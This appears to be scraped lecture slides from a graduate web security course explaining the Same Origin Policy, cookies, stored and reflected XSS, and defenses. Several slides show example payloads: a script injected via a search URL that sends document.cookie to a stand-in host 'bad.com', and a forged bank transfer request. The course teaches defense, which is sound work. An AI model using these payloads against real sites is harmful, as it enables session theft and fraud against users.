For now, we’ll assume this attack model:• The user is visiting the site they expect • All interactions are strictly through the browser
![Page 197: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/197.jpg)
Dynamic web pages• Rather than static HTML, web pages can be
expressed as a program, e.g., written in Javascript:
<html><body>
Hello, <b>
<script>var a = 1;var b = 2;document.write(“world: “, a+b, “</b>”);
</script>
</body></html>
![Page 198: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/198.jpg)
Javascript• Powerful web page programming language
• Scripts are embedded in web pages returned by the web server
• Scripts are executed by the browser. They can: • Alter page contents (DOM objects) • Track events (mouse clicks, motion, keystrokes) • Issue web requests & read replies • Maintain persistent connections (AJAX) • Read and set cookies
no relationto Java
![Page 199: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/199.jpg)
What could go wrong?• Browsers need to confine Javascript’s power
• A script on attacker.com should not be able to: • Alter the layout of a bank.com web page
• Read keystrokes typed by the user while on a bank.com web page
• Read cookies belonging to bank.com
![Page 200: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/200.jpg)
Same Origin Policy• Browsers provide isolation for javascript scripts via
the Same Origin Policy (SOP)
• Browser associates web page elements… • Layout, cookies, events
• …with a given origin • The hostname (bank.com) that provided the
elements in the first place
• SOP = only scripts received from a web page’s origin have access to the page’s elements
![Page 201: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/201.jpg)
Cookies
Browser
Client
(Private) Data
• Store “en” under the key “edition”
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
Semantics
![Page 202: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/202.jpg)
Cookies
Browser
Client
(Private) Data
• Store “en” under the key “edition”
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
Semantics
![Page 203: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/203.jpg)
Cross-site scripting (XSS)
![Page 204: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/204.jpg)
XSS: Subverting the SOP• Attacker provides a malicious script
• Tricks the user’s browser into believing that the script’s origin is bank.com
![Page 205: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/205.jpg)
XSS: Subverting the SOP• Attacker provides a malicious script
• Tricks the user’s browser into believing that the script’s origin is bank.com
• One general approach: • Trick the server of interest (bank.com) to actually
send the attacker’s script to the user’s browser! • The browser will view the script as coming from the
same origin… because it does!
![Page 206: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/206.jpg)
Two types of XSS1. Stored (or “persistent”) XSS attack
• Attacker leaves their script on the bank.com server • The server later unwittingly sends it to your browser • Your browser, none the wiser, executes it within the
same origin as the bank.com server
2. Reflected XSS attack • Attacker gets you to send the bank.com server a URL
that includes some Javascript code • bank.com echoes the script back to you in its response • Your browser, none the wiser, executes the script in the
response within the same origin as bank.com
![Page 211: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/211.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2
![Page 212: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/212.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
![Page 213: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/213.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
Execute the malicious scriptas though the server meant us to run it
4
![Page 214: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/214.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
Execute the malicious scriptas though the server meant us to run it
4 Perform attacker action
5
![Page 215: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/215.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
Execute the malicious scriptas though the server meant us to run it
4 Perform attacker action
5
GET http://bank.com/transfer?amt=9999&to=attacker
![Page 216: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/216.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
Execute the malicious scriptas though the server meant us to run it
4
Steal valuable data
5
Perform attacker action
5
GET http://bank.com/transfer?amt=9999&to=attacker
![Page 217: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/217.jpg)
Stored XSS attack
Browser
Client
bank.com
bad.com
Injectmalicious script
1Request content
2Receive malicious script
3
Execute the malicious scriptas though the server meant us to run it
4
Steal valuable data
5
Perform attacker action
5
GET http://bank.com/transfer?amt=9999&to=attacker
GET http://bad.com/steal?c=document.cookie
![Page 218: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/218.jpg)
Stored XSS Summary• Target: User with Javascript-enabled browser who visits
user-generated content page on a vulnerable web service
• Attack goal: run script in user’s browser with the same access as provided to the server’s regular scripts (i.e., subvert the Same Origin Policy)
• Attacker tools: ability to leave content on the web server (e.g., via an ordinary browser). Optional tool: a server for receiving stolen user information
• Key trick: Server fails to ensure that content uploaded to page does not contain embedded scripts
![Page 219: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/219.jpg)
Two types of XSS1. Stored (or “persistent”) XSS attack
• Attacker leaves their script on the bank.com server • The server later unwittingly sends it to your browser • Your browser, none the wiser, executes it within the
same origin as the bank.com server
2. Reflected XSS attack • Attacker gets you to send the bank.com server a URL
that includes some Javascript code • bank.com echoes the script back to you in its response • Your browser, none the wiser, executes the script in the
response within the same origin as bank.com
![Page 220: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/220.jpg)
Reflected XSS attack
Browser
Clientbad.com
![Page 221: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/221.jpg)
Reflected XSS attack
Browser
Clientbad.comVisit web site
1
![Page 222: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/222.jpg)
Reflected XSS attack
Browser
Clientbad.comVisit web site
1Receive malicious page
2
![Page 223: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/223.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.comVisit web site
1Receive malicious page
2
![Page 224: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/224.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3
Visit web site
1Receive malicious page
2
![Page 225: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/225.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
![Page 226: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/226.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3Echo user input
4
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
![Page 227: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/227.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3Echo user input
4
Execute the malicious scriptas though the server meant us to run it
5
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
![Page 228: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/228.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3Echo user input
4
Execute the malicious scriptas though the server meant us to run it
5 Perform attacker action
6
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
![Page 229: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/229.jpg)
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3Echo user input
4
Execute the malicious scriptas though the server meant us to run it
5
Steal valuable data
6
Perform attacker action
6
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
![Page 230: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/230.jpg)
Echoed input• The key to the reflected XSS attack is to find
instances where a good web server will echo the user input back in the HTML response
![Page 231: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/231.jpg)
Echoed input• The key to the reflected XSS attack is to find
instances where a good web server will echo the user input back in the HTML response
http://victim.com/search.php?term=socksInput from bad.com:
![Page 232: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/232.jpg)
Echoed input• The key to the reflected XSS attack is to find
instances where a good web server will echo the user input back in the HTML response
http://victim.com/search.php?term=socks
<html> <title> Search results </title><body>Results for socks :. . .</body></html>
Input from bad.com:
Result from victim.com:
![Page 233: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/233.jpg)
Exploiting echoed input
![Page 234: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/234.jpg)
Exploiting echoed inputhttp://victim.com/search.php?term= <script> window.open( “http://bad.com/steal?c=“ + document.cookie) </script>
Input from bad.com:
![Page 235: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/235.jpg)
Exploiting echoed inputhttp://victim.com/search.php?term= <script> window.open( “http://bad.com/steal?c=“ + document.cookie) </script>
<html> <title> Search results </title><body>Results for <script> ... </script> . . .</body></html>
Input from bad.com:
Result from victim.com:
![Page 236: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/236.jpg)
Exploiting echoed inputhttp://victim.com/search.php?term= <script> window.open( “http://bad.com/steal?c=“ + document.cookie) </script>
<html> <title> Search results </title><body>Results for <script> ... </script> . . .</body></html>
Browser would execute this within victim.com’s origin
Input from bad.com:
Result from victim.com:
![Page 237: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/237.jpg)
Reflected XSS Summary• Target: User with Javascript-enabled browser who a
vulnerable web service that includes parts of URLs it receives in the web page output it generates
• Attack goal: run script in user’s browser with the same access as provided to the server’s regular scripts (i.e., subvert the Same Origin Policy)
• Attacker tools: ability to get user to click on a specially-crafted URL. Optional tool: a server for receiving stolen user information
• Key trick: Server fails to ensure that the output it generates does not contain embedded scripts other than its own
![Page 238: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/238.jpg)
XSS Protection• Open Web Application Security Project (OWASP):
• Whitelist: Validate all headers, cookies, query strings… everything.. against a rigorous spec of what should be allowed
• Don’t blacklist: Do not attempt to filter/sanitize.
• Principle of fail-safe defaults.
![Page 239: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/239.jpg)
Mitigating cookie security threats• Cookies must not be easy to guess
• Randomly chosen • Sufficiently long
• Time out session IDs and delete them once the session ends
![Page 240: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/240.jpg)
Twitter vulnerability• Uses one cookie (auth_token) to validate user
• The cookie is a function of • User name • Password
• auth_token weaknesses • Does not change from one login to the next • Does not become invalid when the user logs out
• Steal this cookie once, and you can log in as the user any time you want (until password change)
![Page 241: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/241.jpg)
XSS vs. CSRF• Do not confuse the two:
• XSS attacks exploit the trust a client browser has in data sent from the legitimate website • So the attacker tries to control what the website sends
to the client browser
• CSRF attacks exploit the trust the legitimate website has in data sent from the client browser • So the attacker tries to control what the client browser
sends to the website